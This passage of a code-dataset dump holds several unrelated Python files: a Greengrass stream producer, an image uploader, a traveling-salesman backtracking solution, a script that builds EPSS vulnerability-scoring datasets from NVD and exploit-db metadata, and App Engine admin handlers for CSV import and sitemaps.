It simply places the data\n onto the LocalDataStream.\n\n Args:\n event (bytes): UTF-8 encoded byte stream (binary)\n context (dict): Mirrors cloud Lambda (unused) \n \"\"\"\n\n logger.info(f\"Event data is: {event}\")\n try:\n # Incoming event is already byte encoded\n client.append_message(stream_name=\"LocalDataStream\", data=event)\n except Exception as e:\n logger.error(f\"Error appending: {e}\")\n return\n","repo_name":"awslabs/aws-iot-greengrass-accelerators","sub_path":"v1/stream_manager/cdk/lambda-gg-stream-producer/lambda_code/stream_producer.py","file_name":"stream_producer.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"34"} +{"seq_id":"28309646870","text":"import http.client\nimport mimetypes\nimport os\nfrom typing import Tuple, Union\nfrom urllib import parse\nfrom pprint import pprint\nimport argparse\n\n\nclass ImageUploaderError(Exception):\n pass\n\n\nclass ImageUploader:\n IMG_EXT = {\".gif\", \".jpeg\", \".jpg\", \".png\", \".svg\"}\n\n def __init__(self, url, img_dir):\n self.url = parse.urlparse(url)\n self.img_dir = img_dir\n self.conn = http.client.HTTPSConnection if self.url.scheme == \"https\" else http.client.HTTPConnection\n\n def _get_mimetype(self, img: str) -> str:\n return mimetypes.types_map[os.path.splitext(img)[1]]\n\n def _get_file(self, img: str) -> Tuple[bytes, str]:\n try:\n with open(img, \"rb\") as f:\n return f.read(), self._get_mimetype(img)\n except OSError as err:\n raise ImageUploaderError(f\"Can't open file: {err}\")\n\n def _get_connection(self) -> Union[http.client.HTTPConnection, http.client.HTTPSConnection]:\n try:\n return self.conn(self.url.netloc)\n except http.client.HTTPException as err:\n pprint(f\"Can't connect to resource: {err}\")\n exit(1)\n\n def _upload(self, img: str):\n try:\n payload, mimetype = self._get_file(img)\n except ImageUploaderError as err:\n pprint(err)\n return\n headers = {\n 'Content-Type': mimetype,\n 'Content-Disposition': f'attachment; filename={os.path.split(img)[1]}'\n }\n\n connection = self._get_connection()\n connection.request(\"POST\", \"/images\", payload, headers)\n try:\n r = connection.getresponse()\n except ConnectionResetError as err:\n pprint(f\"Response error while uploading {img}: {err}\")\n return\n if r.status != 200:\n pprint(f\"Can't upload file {img}, resource response: {r.read()}\")\n return\n pprint(f'File {img} successfully uploaded!')\n\n def _get_images_from_dir(self) -> list:\n return [os.path.join(self.img_dir, img) for img in os.listdir(self.img_dir)\n if os.path.splitext(img)[1] in self.IMG_EXT]\n\n def upload(self):\n if not os.path.isdir(self.img_dir):\n pprint(f\"It's not a directory: {self.img_dir}\")\n exit(1)\n images = self._get_images_from_dir()\n for i in images:\n self._upload(i)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--server', type=str, nargs='?', required=True)\n parser.add_argument('--dir', type=str, nargs=\"?\", required=True)\n args = parser.parse_args()\n uploader = ImageUploader(args.server, args.dir)\n uploader.upload()\n","repo_name":"GeorgeS1995/nlogic_testtask","sub_path":"image_uploader.py","file_name":"image_uploader.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2331641639","text":"numeros = [20,34,53,5,24,55,36,87]\r\nprint(\"pares\")\r\n\r\nfor numero in numeros:\r\n if numero % 2 ==0:\r\n print 
(numero)\r\n\r\nprint(\"\\nimpares\")\r\ni = 0\r\nwhile(i < len(numeros)):\r\n    if numeros[i] % 2 == 1:\r\n        print(numeros[i])\r\n    i += 1","repo_name":"Vera3588/UPB-001","sub_path":"ClasesUpb/Clases/Clase 5/ciclos.py","file_name":"ciclos.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"82957702","text":"'''\n******* Thoughts after solving *********\nOther graph problems just check whether you can reach the end,\nso it is enough to mark visited nodes in one shared structure as you go.\n\nWith backtracking, however, you come back and must go again without the places you passed,\nso you need to undo what you previously added.\n\nCompare the wolf problem I solved earlier: there the wolves stay with you the whole time,\nand they do not disappear even when you climb back up the tree.\nSo in that problem I managed visited with deepcopy and never removed the wolves again.\n\nHere, by contrast, going back erases the visit history, so deepcopy is unnecessary,\nand when you come back you must remove the mark again.\n'''\n\n'''\n2022/05/23\nboj.kr/10971\nTraveling Salesman Tour 2 (외판원 순회 2)\n\nProblem:\nThe traveling salesman problem, called the Traveling Salesman Problem (TSP) in English,\nis one of the most important problems in computer science.\nThere are many variants, but here we consider the most common form.\n\nThere are cities numbered 1 to N, with roads between them (some roads may not exist).\nA salesman plans a tour that starts from one city, passes through all N cities, and\nreturns to the original city. A city once visited cannot be visited again\n(returning to the starting city at the very end is the exception). Among the many\npossible routes, we want to plan the one with the lowest cost.\n\nThe cost of moving between cities is given as a matrix W[i][j]: the cost of going from\ncity i to city j. Costs are not symmetric, i.e. W[i][j] may differ from W[j][i]. All\ncosts between cities are positive integers, and W[i][i] is always 0. In some cases it\nis impossible to go from city i to city j; then W[i][j] = 0.\n\nGiven N and the cost matrix, write a program that finds the salesman's minimum-cost tour.\n\nInput:\nThe first line contains the number of cities N (2 ≤ N ≤ 10). The next N lines contain\nthe cost matrix. Each entry is a positive integer of at most 1,000,000,\nand 0 is given when the trip is impossible. W[i][j] is the cost of going from city i to j.\n\nOnly inputs for which a tour is always possible are given.\n\nOutput:\nPrint the minimum cost required for the salesman's tour on the first line.\n'''\n\nimport sys\nimport copy\ninput = sys.stdin.readline\n\nn = int(input())\n\ngraph = [[] for _ in range(n)]\n\nfor i in range(n):\n    graph[i] = list(map(int, input().split()))\n\nmin_value = 9999999999\n\n\ndef dfs(start, fix_start, count, visited, value):\n    global min_value\n    print(visited)\n    if count == n:\n        if start == fix_start:\n            min_value = min(min_value, value)\n        return\n    elif value > min_value:\n        return\n    else:\n        for i in range(len(graph[start])):\n            # only when the weight is nonzero and the city is unvisited\n            if graph[start][i] != 0 and visited[i] == False:\n                visited[i] = True\n                dfs(i, fix_start, count+1,\n                    visited, value+graph[start][i])\n                visited[i] = False\n\n\nfor i in range(n):\n    visited = [False for _ in range(n)]\n    dfs(i, i, 0, visited, 0)\n\nprint(min_value)\n","repo_name":"P3RP/daily-algorithm-test","sub_path":"kty/baekjoon/10971.py","file_name":"10971.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4422834102","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 13 05:13:54 2022\n\n@author: Arman Hossain\n\"\"\"\n\n# ! 
pip install pyexploitdb\n\nimport pandas as pd\n\nfrom df_utilities import add_columns_to_df\nfrom pyExploitDb import PyExploitDb\nfrom utilities import read_csv_dataset\nfrom nvd_downloader import download_data\nfrom merging_16_22_databases import merge_all\n# from epss_top_vendors_prods import generate_top_vendor_prod\nimport gzip\nfrom PyQt5.QtWidgets import (\n    QApplication)\n\nclass P_ven_prod():\n    def __init__(self,cpe_series):\n        self.cpe_series = cpe_series\n        self.vendors = []\n        self.prods = []\n        self.vendor_df = pd.DataFrame()\n        self.prod_df = pd.DataFrame()\n        self.vendor_info = {}\n    \n    def perse(self,top_vendors,top_prods):\n        '''\n        this adds one column per vendor from top_vendors (and per product from top_prods) for every CVE id.\n        example:\n            id microsoft chrome\n            1 5 6\n            2 0 0 [because cve-2 does not affect microsoft or chrome]\n\n        '''\n        \n        lst = self.cpe_series.values.tolist()\n        # vendor_lst1 = ['microsoft','adobe','ibm','hp','apache','apple','linux','oracle','opensuse','cisco','huawei','canonical','redhat','debian']\n        # vendor_lst = ['microsoft','adobe','ibm','hp','apache','apple','google']\n        df = pd.DataFrame()\n        # for vendor in vendor_lst:\n        #     df[vendor] = [0]*len(cpe_series)\n        \n        index = 0\n        for item in lst:\n            if(not isinstance(item, str)):\n                index+=1\n                continue\n            cpe_lst = item.split('#arman#')\n            \n            for a_cpe in cpe_lst:\n                a_cpe_sp = a_cpe.split(':')\n                vendor= a_cpe_sp[3]\n                prod = vendor+\"_\"+a_cpe_sp[4]\n                if vendor not in self.vendors:\n                    self.vendors.append(vendor)\n                    if vendor in top_vendors.index:\n                        self.vendor_df[vendor] = [0]*len(self.cpe_series)\n                if vendor in top_vendors.index:\n                    self.vendor_df[vendor][index] = top_vendors['count'][vendor]\n                \n                # if prod not in self.prods:\n                #     self.prods.append(prod)\n                #     if prod in top_prods.index:\n                #         self.prod_df[prod] = [0]*len(self.cpe_series)\n                # if prod in top_prods.index:\n                #     self.prod_df[prod][index] = top_prods['count'][prod]\n                \n            \n            index+=1\n    def gen_vendor_info(self):\n        \n        '''\n        returns every vendor and its occurrence count in the cpe23Uri data, e.g.\n        microsoft 34234\n        juniper 234\n        ...\n        '''\n        \n        lst = self.cpe_series.values.tolist()\n        index = 0\n        for item in lst:\n            if(not isinstance(item, str)):\n                index+=1\n                continue\n            cpe_lst = item.split('#arman#')\n            for a_cpe in cpe_lst:\n                a_cpe_sp = a_cpe.split(':')\n                vendor= a_cpe_sp[3]\n                \n                if vendor not in self.vendor_info.keys():\n                    self.vendor_info[vendor] = 0\n                self.vendor_info[vendor] += 1\n                \n            index+=1\n        \n        return pd.DataFrame.from_dict(self.vendor_info, orient='index') \n    \n    \n    \n    # def gen_vendor_info2(self):\n    #     lst = self.cpe_series.values.tolist()\n    #     index = 0\n    #     for item in lst:\n    #         if(not isinstance(item, str)):\n    #             index+=1\n    #             continue\n    #         cpe_lst = item.split('#arman#')\n    #         temp_list = []\n    #         for a_cpe in cpe_lst:\n    #             a_cpe_sp = a_cpe.split(':')\n    #             vendor= a_cpe_sp[3]\n    #             \n    #             if vendor not in self.vendor_info.keys():\n    #                 self.vendor_info[vendor] = 0\n    #             if(vendor):\n    #                 self.vendor_info[vendor] += 1\n    #             \n    #         index+=1\n    #     \n    #     return pd.DataFrame.from_dict(self.vendor_info, orient='index')\n    \n\n\n\n    \n\ndef count_ref(ref_source):\n    \n    lst = ref_source.values.tolist()\n    df = pd.DataFrame()\n    df['ref_count'] = [0]*len(ref_source)\n    \n    index = 0\n    for item in lst:\n        if(not isinstance(item, str)): # if None\n            index+=1\n            continue\n        refcnt = len(item.split('#arman#'))\n        \n        df['ref_count'][index] = refcnt\n        index+=1\n    \n    return df\n    \n\n# def exploit():\n#     expltlst = ['poc_code','weaponized']\n#     return 0\n\n\ndef tags_poc_from_exploit_db(cve_id_series):\n    \n    # taglst = 
['remote','dos','webapps','local'] # 'code_execution','memory_corruption' not in exploitdb\n taglst = [] # 'code_execution','memory_corruption' not in exploitdb\n pEdb = PyExploitDb()\n pEdb.debug = False\n pEdb.openFile()\n \n df = pd.DataFrame()\n # for tag in taglst:\n # df[tag] = [0]*len(cve_id_series)\n \n # df['poc_code'] = [0]*len(cve_id_series) \n df['code_link'] = [None]*len(cve_id_series) \n \n index = 0\n for id in cve_id_series: \n results = pEdb.searchCve(id)\n # results = pEdb.searchCve('CVE-2018-14592')\n # results = pEdb.searchCve('CVE-2021-1167')\n if (results==[] or type(results) != dict):\n index+=1\n continue\n else:\n # df['poc_code'][index] = 1\n df['code_link'][index] = results['exploit']\n # if(\"tag_\"+results['platform'] not in taglst):\n # taglst.append(\"tag_\"+results['platform'])\n # df[\"tag_\"+results['platform']] = [0]*len(cve_id_series)\n # df[\"tag_\"+results['platform']][index] = 1\n \n \n index+=1\n \n \n return df\n \n\n\ndef get_epss(data):\n data[\"epss\"] = [0]*len(data)\n \n epss = ''\n with gzip.open('./downloaded/epss_scores-current.csv.gz') as f:\n epss = pd.read_csv(f)\n epss.columns = ['epss', 'percentile']\n for id in epss.index:\n if id in data.index:\n score = epss['epss'][id]\n data['epss'][id] = score\n return data\n\ndef get_exploitdb(total_df,isExcel=True):\n exploit = pd.read_csv('./downloaded/files_exploits.csv')\n # exploit.codes[0].split(';')[0].find('CVE')\n idx = 0\n for idd in exploit.codes:\n QApplication.processEvents()\n if type(idd) == float:\n idx+=1\n continue\n for code in idd.split(';'):\n if code.find('CVE') ==0:\n if code in total_df.index:\n QApplication.processEvents()\n if isExcel: \n # total_df['code_link'][code] = 'https://gitlab.com/exploit-database/exploitdb/-/tree/main/'+exploit.file[idx]\n if type(total_df['code_link'][code]) != str:\n total_df['code_link'][code] = 'https://exploit-db.com/exploits/'+str(exploit.id[idx])\n else:\n total_df['code_link'][code] += '; '+'https://exploit-db.com/exploits/'+str(exploit.id[idx])\n total_df['code_link_count'][code] += 1\n idx+=1\n \n return total_df\n\ndef generate(data,top_vend,top_prod):\n \n total_df = pd.DataFrame()\n total_df['ID'] = data['ID']\n \n\n vendor_product_perser = P_ven_prod(data['cpe23Uri'])\n vendor_product_perser.perse(top_vend,top_prod)\n total_df = add_columns_to_df(total_df, vendor_product_perser.vendor_df)\n \n ref_cnt_df = count_ref(data['refsource'])\n total_df = add_columns_to_df(total_df, ref_cnt_df)\n \n # tag_poc_df = tags_poc_from_exploit_db(data['ID'])\n # total_df = add_columns_to_df(total_df, tag_poc_df)\n \n total_df.index = total_df[\"ID\"]\n total_df.drop('ID', inplace=True, axis=1)\n\n total_df['code_link_count'] = [0]*len(total_df) \n total_df = get_exploitdb(total_df,False)\n \n total_df = get_epss(total_df)\n # total_df.to_csv(\"166_22_desc_filtered_data.csv\",index=False)\n \n return total_df\n\ndef generate_for_ui(data):\n \n total_df = pd.DataFrame()\n total_df['ID'] = data['ID']\n \n total_df = add_columns_to_df(total_df, data['description'],'description')\n total_df = add_columns_to_df(total_df, data['url'],'url')\n \n \n \n ref_cnt_df = count_ref(data['refsource'])\n total_df = add_columns_to_df(total_df, ref_cnt_df)\n \n total_df = add_columns_to_df(total_df, data['tags'],'tags')\n total_df = add_columns_to_df(total_df, data['cpe23Uri'],'cpeUri')\n total_df = add_columns_to_df(total_df, data['vectorString'],'vectorString_v31')\n total_df = add_columns_to_df(total_df, data['vectorString_v2'],\"vectorString_v2\")\n total_df = 
add_columns_to_df(total_df, data['baseScore'],'CVSS_v31')\n total_df = add_columns_to_df(total_df, data['baseScore_v2'],'CVSS_v2')\n total_df = add_columns_to_df(total_df, data['publishedDate'],'publishedDate')\n # total_df = add_columns_to_df(total_df, data['epss'],'epss')\n \n # data['CVSS31'] = mdata['baseScore']\n # data['CVSS2'] = mdata['baseScore_v2']\n \n # tag_poc_df = tags_poc_from_exploit_db(data['ID'])\n # total_df = add_columns_to_df(total_df, tag_poc_df)\n \n total_df.index = total_df[\"ID\"]\n total_df.drop('ID', inplace=True, axis=1)\n \n total_df['code_link'] = [None]*len(total_df)\n total_df['code_link_count'] = [0]*len(total_df)\n total_df = get_exploitdb(total_df)\n \n \n total_df = get_epss(total_df)\n \n return total_df\n\ndef dataforexcel():\n data = read_csv_dataset('./data/2002_22_nvd.csv')\n excel_data = generate_for_ui(data) \n excel_data.to_csv('./data/data_for_excel.csv')\n \ndef epss_thesholding(data,a=0.00949,b=0.019):\n \n # a = 0.00949\n # b = 0.019\n \n l = len(data[data['epss']<= a])/len(data)\n r = len(data[data['epss']>= b])/len(data)\n m = 1-l-r\n print('a: ',a,' b: ',b)\n print('epss: ','low rating-',l,'medium rating-',m,'critical rating-',r)\n \n for id in data.index:\n if data['epss'][id] <= a:\n data['epss'][id] = 1\n elif data['epss'][id] < b:\n data['epss'][id] = 2\n else:\n data['epss'][id] = 3\n return data\n\ndef cvss_thresholding(data,col_name = 'cvss'):\n \n one = len(data[data[col_name] < 0.1])/len(data)\n two = len(data[data[col_name] < 4.0])/len(data) - one\n three = len(data[data[col_name] < 7.0])/len(data) - two - one\n four = len(data[data[col_name] < 9.0])/len(data) - three - two - one\n five = len(data[data[col_name] >= 9.0])/len(data)\n \n print('one ',one, ' two ',two,' three ',three,' four ',four,' five ',five)\n\n \n for id in data.index:\n if data[col_name][id] < 0.1:\n data[col_name][id] = 1\n elif data[col_name][id] < 4.0:\n data[col_name][id] = 2\n elif data[col_name][id] < 7.0:\n data[col_name][id] = 3\n elif data[col_name][id] < 9.0:\n data[col_name][id] = 4\n else:\n data[col_name][id] = 5\n return data\n\ndef filter_data(data):\n data = data[data.attackVector != -1]\n data = data[data.attackComplexity != -1]\n data = data[data.privilegesRequired != -1]\n data = data[data.userInteraction != -1]\n data = data[data.scope != -1]\n data = data[data.confidentialityImpact != -1]\n data = data[data.integrityImpact != -1]\n data = data[data.availabilityImpact != -1]\n return data\n\ndef preprocess(a=0.00949,b=0.019,cvss = False):\n \n data = pd.read_csv('./data/data2/epss_dataset.csv',index_col = 0)\n \n if cvss:\n del data['epss'] # comment to include epss\n else:\n del data['cvss'] # comment to include cvss\n data = data[data.epss!=0]\n \n # data['cvss'] = data['cvss'].round()\n # data['epss'].astype(float)\n # data['epss'] = data['epss'].round(decimals=2)\n \n \n data.dropna(inplace=True) # cvss contains null value\n data = filter_data(data)\n if cvss:\n data = cvss_thresholding(data)\n data.to_csv('./data/data2/cvss_dataset_final_epss.csv')\n else:\n data2 = epss_thesholding(data,a,b)\n data2.to_csv('./data/data2/epss_dataset_final_epss.csv')\n # data.to_csv('./data/data2/cvss_epss.csv')\n \n\n\ndef valid_index(lst):\n gotZero = False\n first = 0\n for i in range (0,len(lst)):\n if lst[i]==-1:\n if gotZero:\n return first,i\n elif not gotZero:\n gotZero = True\n first = i\n return first, len(lst)\n\n\ndef collectepsstraindata():\n mdata = read_csv_dataset('./data/2016_22_nvd.csv')\n # mdata.to_csv('./data/2016_22m_nvd.csv')\n # 
generate_top_vendor_prod()\n    \n    top_vend = pd.read_csv('./data/top_vendors.csv',index_col=0)\n    top_prod = pd.read_csv('./data/top_products.csv',index_col=0)\n    \n    \n    data = generate(mdata,top_vend,top_prod)\n    arr = ['attackVector','attackComplexity','privilegesRequired','userInteraction','scope',\n           'confidentialityImpact','integrityImpact','availabilityImpact']\n    \n    for i in arr:\n        codes, uniques = pd.factorize(mdata[i])\n        data[i] = codes\n    \n    mdata.index = mdata[\"ID\"]\n    mdata.drop('ID', inplace=True, axis=1)\n    \n    topics_data = pd.read_csv(\"./data/epss_topics_16_22.csv\")\n    data = add_columns_to_df(data,topics_data)\n    \n    dat = mdata['baseScore']\n    data['cvss'] = dat #list(dat.round())\n    \n    \n    \n    dat = data['epss'].astype(float)\n    data.drop('epss', inplace=True, axis=1)\n    data['epss'] = dat #list(dat.round(decimals=2))\n    data.to_csv('./data/epss_dataset.csv')\n    \n    return data\n    \n#%% main\nif __name__ == \"__main__\":\n    # for EPSS model generation data\n    \n    affected_years = download_data()\n    data = merge_all('./downloaded',2016,2050) # the affected years should be used and merged with the original database in order to reduce time\n    data.to_csv('./data/2016_22_nvd.csv',index=False)\n    mdata = read_csv_dataset('./data/2016_22_nvd.csv')\n    mdata.to_csv('./data/2016_22m_nvd.csv')\n    \n    data = collectepsstraindata()\n    # end\n    \n    \n    \n# saving data\n\n    import pickle\n    with open('all_data.pickle', 'wb') as f:\n        pickle.dump(data, f)\n    \n    data.to_csv('./data/epss_16_22_without_topic.csv')\n    # data2.to_csv('latest2.csv',index = False)  # data2 only exists after preprocess() has run\n    \n    \n    data.to_csv(\"16_22_desc_filtered_data.csv\",index=False)\n    \n    vendor_product_parser = P_ven_prod(data['cpe23Uri'])\n    \n    vendor_product_parser.gen_vendor_info()\n    \n    vendor_inf = vendor_product_parser.vendor_info\n    \n    \n    df = pd.DataFrame.from_dict(vendor_inf, orient='index') \n    df.to_csv('vendor.csv')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"arman18/Vulnerability_scoring_system","sub_path":"epss_dataset_generator.py","file_name":"epss_dataset_generator.py","file_ext":"py","file_size_in_byte":14815,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} {"seq_id":"41844833659","text":"# -*- coding: utf-8 -*-\r\nimport webapp2\r\nimport datetime\r\nimport json\r\nimport cloudstorage as gcs\r\n\r\nfrom google.appengine.ext import blobstore\r\nfrom google.appengine.ext.webapp import blobstore_handlers\r\nfrom google.appengine.api import taskqueue\r\nfrom dbClass import *\r\nfrom google.appengine.datastore.datastore_query import Cursor\r\n\r\n\r\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'template')\r\njinja_env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_dir), autoescape=True)\r\n\r\n\r\nclass Handler(webapp2.RequestHandler):\r\n    # Handler extended to integrate Jinja template rendering\r\n    def write(self, *a, **kw):\r\n        self.response.out.write(*a, **kw)\r\n\r\n    @staticmethod\r\n    def render_str(template, **params):\r\n        t = jinja_env.get_template(template)\r\n        return t.render(params).encode(encoding=\"utf-8\")\r\n\r\n    def render(self, template, **kw):\r\n        self.write(self.render_str(template, **kw).decode(encoding=\"utf-8\"))\r\n\r\n\r\nclass MainHandler(webapp2.RequestHandler):\r\n    def get(self):\r\n        upload_url = blobstore.create_upload_url('/admin/upload')\r\n
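        # The page below must post a multipart form with a file field named\r\n        # 'file' and a 'type_csv' value of \"ville\" or \"departement\" -- that is\r\n        # all UploadHandler.post() reads; the markup is a minimal sketch of it.\r\n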
        html_string = \"\"\"\r\n        <form action=\"%s\" method=\"POST\" enctype=\"multipart/form-data\">\r\n            Fichier CSV : <input type=\"file\" name=\"file\"><br>\r\n            <input type=\"radio\" name=\"type_csv\" value=\"ville\" checked> ville\r\n            <input type=\"radio\" name=\"type_csv\" value=\"departement\"> departement<br>\r\n            <input type=\"submit\" value=\"Envoyer\">\r\n        </form>\r\n        \"\"\" % upload_url\r\n\r\n        self.response.write(html_string)\r\n\r\n\r\nclass UploadHandler(blobstore_handlers.BlobstoreUploadHandler):\r\n    def post(self):\r\n        upload_files = self.get_uploads('file') # 'file' is file upload field in the form\r\n        type_csv = self.request.get(\"type_csv\")\r\n        blob_info = upload_files[0]\r\n        if type_csv == \"ville\":\r\n            taskqueue.add(url='/admin/process_csv', params={'blob_key': blob_info.key(), 'cursor': 0})\r\n        elif type_csv == \"departement\":\r\n            taskqueue.add(url='/admin/departement_csv', params={'blob_key': blob_info.key()})\r\n        # blobstore.delete(blob_info.key()) # optional: delete file after import\r\n        self.redirect(\"/admin/\")\r\n\r\n\r\nclass NetoyerDoublonHandler(webapp2.RequestHandler):\r\n    def get(self):\r\n        taskqueue.add(url='/admin/process_doublon')\r\n        self.redirect(\"/admin/\")\r\n\r\n\r\nclass ProcessCsv(webapp2.RequestHandler):\r\n    def post(self):\r\n        max_data_access = 1000\r\n        blob_info = self.request.get('blob_key')\r\n        cursor = int(self.request.get('cursor'))\r\n        blob_reader = blobstore.BlobReader(blob_info)\r\n        i = 0\r\n        for row in blob_reader:\r\n            if i >= cursor and i < cursor + max_data_access:\r\n                pays, CP, ville, info1, info2, departement, \\\r\n                numDepartement, arrond, numArrond, latitude, longitude, precision = row.split('\\t')\r\n                if len(CP) <= 5:\r\n                    entry = Commune(nom=ville, CP=CP, departement=numDepartement, pays=pays,\r\n                                    coordonnees=ndb.GeoPt(latitude + \", \" + longitude))\r\n                    queryVille = Commune.query(ndb.AND(Commune.nom == entry.nom, Commune.CP == entry.CP))\r\n                    if queryVille.count() == 0:\r\n                        entry.put()\r\n            elif i >= cursor + max_data_access:\r\n                next_cursor = cursor + max_data_access\r\n                taskqueue.add(url='/admin/process_csv', params={'blob_key': blob_info,\r\n                                                                'cursor': next_cursor},\r\n                              countdown=21600)\r\n                break\r\n            i += 1\r\n\r\n\r\nclass DepartementCsv(webapp2.RequestHandler):\r\n    def post(self):\r\n        blob_info = self.request.get('blob_key')\r\n        blob_reader = blobstore.BlobReader(blob_info)\r\n        for row in blob_reader:\r\n            old_num, num, nom, info1, info2, info3 = row.split(\",\")\r\n            query_departement = Departement.query(Departement.numero == num[1:-1]).get()\r\n            if query_departement:\r\n                query_departement.lettre = nom[1:-1]\r\n                query_departement.put()\r\n            else:\r\n                nouveau_departement = Departement(numero=num[1:-1], lettre=nom[1:-1])\r\n                nouveau_departement.put()\r\n\r\n\r\nclass SuprimeDoubleVille(webapp2.RequestHandler):\r\n    def post(self):\r\n        max_data_access = 10000\r\n        curs = Cursor(urlsafe=self.request.get('cursor'))\r\n        if curs:\r\n            query_ville, next_cursor, more = Commune.query().fetch_page(max_data_access, start_cursor=curs)\r\n        else:\r\n            query_ville, next_cursor, more = Commune.query().fetch_page(max_data_access)\r\n\r\n        for ville in query_ville:\r\n            query_same = Commune.query(ndb.AND(ndb.AND(Commune.nom == ville.nom, Commune.departement == ville.departement),\r\n                                               Commune.CP != ville.CP))\r\n            for doublon in query_same:\r\n                doublon.key.delete()\r\n\r\n        if more:\r\n            taskqueue.add(url='/admin/process_doublon', params={'cursor': next_cursor.urlsafe()},\r\n                          countdown=86400)\r\n\r\n\r\nclass LowerCase(webapp2.RequestHandler):\r\n    def get(self):\r\n        taskqueue.add(url='/admin/lowerCaseVille')\r\n        self.redirect(\"/admin/\")\r\n\r\n    def post(self):\r\n        max_data_access = 7000\r\n
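        # Datastore batching pattern used throughout this file: fetch one page\r\n        # behind a Cursor, process it, then re-enqueue this same handler with\r\n        # next_cursor until more is False.\r\n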
        curs = Cursor(urlsafe=self.request.get('cursor'))\r\n        if curs:\r\n            queryVille, next_cursor, more = Commune.query().fetch_page(max_data_access, start_cursor=curs)\r\n        else:\r\n            queryVille, next_cursor, more = Commune.query().fetch_page(max_data_access)\r\n        for ville in queryVille:\r\n            ville.put()\r\n\r\n        if more:\r\n            taskqueue.add(url='/admin/lowerCaseVille', params={'cursor': next_cursor.urlsafe()},\r\n                          countdown=86400)\r\n\r\n\r\nclass RecompteHandler(webapp2.RequestHandler):\r\n    def get(self):\r\n        taskqueue.add(url='/admin/rest_compte_dep_ville')\r\n        self.redirect(\"/admin/\")\r\n\r\n    def post(self):\r\n        max_data_access = 1000\r\n        curs = Cursor(urlsafe=self.request.get('cursor'))\r\n        query_ville = AireDeJeux.query(projection=[AireDeJeux.ville], distinct=True)\r\n        if curs:\r\n            liste_ville, next_cursor, more = query_ville.fetch_page(max_data_access, start_cursor=curs)\r\n        else:\r\n            liste_ville, next_cursor, more = query_ville.fetch_page(max_data_access)\r\n        for key_ville in liste_ville:\r\n            query_aire_de_jeux = AireDeJeux.query(AireDeJeux.ville == key_ville.ville)\r\n            ville = key_ville.ville.get()\r\n            ville.nbr_aire_de_jeux = query_aire_de_jeux.count()\r\n            logging.info(ville.nom + \": \" + str(ville.nbr_aire_de_jeux))\r\n            ville.put()\r\n        if more:\r\n            taskqueue.add(url='/admin/rest_compte_dep_ville', params={'cursor': next_cursor.urlsafe()},\r\n                          countdown=86400)\r\n        else:\r\n            query_departement = Commune.query(projection=[Commune.departement], distinct=True)\r\n            for dep in query_departement:\r\n                query_ville = Commune.query(Commune.departement == dep.departement).fetch(projection=[Commune.nbr_aire_de_jeux])\r\n                count = 0\r\n                for ville in query_ville:\r\n                    count += ville.nbr_aire_de_jeux\r\n                departement = Departement.query(Departement.numero == dep.departement).get()\r\n                if departement:\r\n                    departement.nbr_aire_de_jeux = count\r\n                    departement.put()\r\n                else:\r\n                    new_departement = Departement(numero=dep.departement, nbr_aire_de_jeux=count)\r\n                    new_departement.put()\r\n\r\n\r\nclass SitemapBlobHandler(webapp2.RequestHandler):\r\n    def get(self):\r\n        sitemap = gcs.open(\"/oujouerdehors/sitemap.xml\", mode=\"w\", content_type=\"text/xml\")\r\n        sitemap.write(\"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n                      <urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\r\n                      \"\"\")\r\n        sitemap.write(\"\"\"<url><loc>http://www.oujouerdehors.org/</loc>\r\n                      <changefreq>monthly</changefreq>\r\n                      <priority>1</priority></url>\"\"\")\r\n        sitemap.write(\"\"\"<url><loc>http://www.oujouerdehors.org/aireDeJeux</loc>\r\n                      <changefreq>monthly</changefreq>\r\n                      <priority>0.9</priority></url>\"\"\")\r\n        template = \"\"\"<url><loc>http://www.oujouerdehors.org/%DATA%</loc>\r\n                   <changefreq>monthly</changefreq>\r\n                   <priority>%SCORE%</priority></url>\"\"\"\r\n        query_aire_de_jeux = AireDeJeux.query()\r\n        for aire_de_jeux in query_aire_de_jeux:\r\n            new_url = template.replace(\"%DATA%\", \"aireDeJeux/\" + aire_de_jeux.url)\r\n            new_url = new_url.replace(\"%SCORE%\", \"0.5\")\r\n            sitemap.write(new_url.encode(\"utf-8\"))\r\n        query_departement = Departement.query(Departement.nbr_aire_de_jeux > 0)\r\n        for departement in query_departement:\r\n            logging.info(departement.numero)\r\n            new_url = template.replace(\"%DATA%\", \"aireDeJeux/\" + departement.numero)\r\n            new_url = new_url.replace(\"%SCORE%\", \"0.85\")\r\n            sitemap.write(new_url.encode(\"utf-8\"))\r\n        query_commune = Commune.query(Commune.nbr_aire_de_jeux > 0)\r\n        for commune in query_commune:\r\n            new_url = template.replace(\"%DATA%\", \"aireDeJeux/\" + commune.departement + \"/\" + commune.nom)\r\n            new_url = new_url.replace(\"%SCORE%\", \"0.75\")\r\n            sitemap.write(new_url.encode(\"utf-8\"))\r\n        sitemap.write(\"</urlset>\")\r\n        sitemap.close()\r\n        self.redirect(\"/admin/\")\r\n\r\n\r\nclass AjoutDateHandler(webapp2.RequestHandler):\r\n    def get(self):\r\n        curent_date = datetime.datetime.now()\r\n        query_aire_de_jeux = AireDeJeux.query()\r\n        for aire_de_jeux in query_aire_de_jeux:\r\n            change = False\r\n            if not aire_de_jeux.date_creation:\r\n                aire_de_jeux.date_creation = curent_date\r\n                change 
